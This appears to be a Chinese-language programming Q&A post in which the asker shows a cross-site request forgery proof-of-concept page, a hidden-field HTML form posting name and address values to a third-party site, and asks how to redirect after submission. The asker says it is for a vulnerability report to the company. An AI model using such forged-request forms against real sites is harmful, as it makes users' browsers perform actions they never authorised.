【发布时间】:2017-10-28 12:13:03
【问题描述】:
我对 HTML 编码还很陌生。在互联网上搜索了几个小时的方法后,我失败了,所以我在这里。我在这里设置了一个 CSRF 概念证明页面,我希望它重定向到另一个页面,该页面将执行 CSRF 已实现的有效负载。
<html>
<body>
<form action="https://website.com/action.php?" method="POST">
<input type="hidden" name="fullname" value="john" />
<input type="hidden" name="address" value="street 2, 32 ave" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
所以在使用这个表单提交之后,它所做的就是重定向到这个页面
但我希望它重定向到另一个 URL 并提交该表单。
【问题讨论】:
-
在您的操作中,我不确定您是否需要 ?。为什么不直接去 action.php 做你想做的事,然后从那里重定向到你想要的 url
-
我愿意,但该网站不归我所有,正如我所说,这是我向公司报告的 CSRF(跨站点请求伪造)概念证明。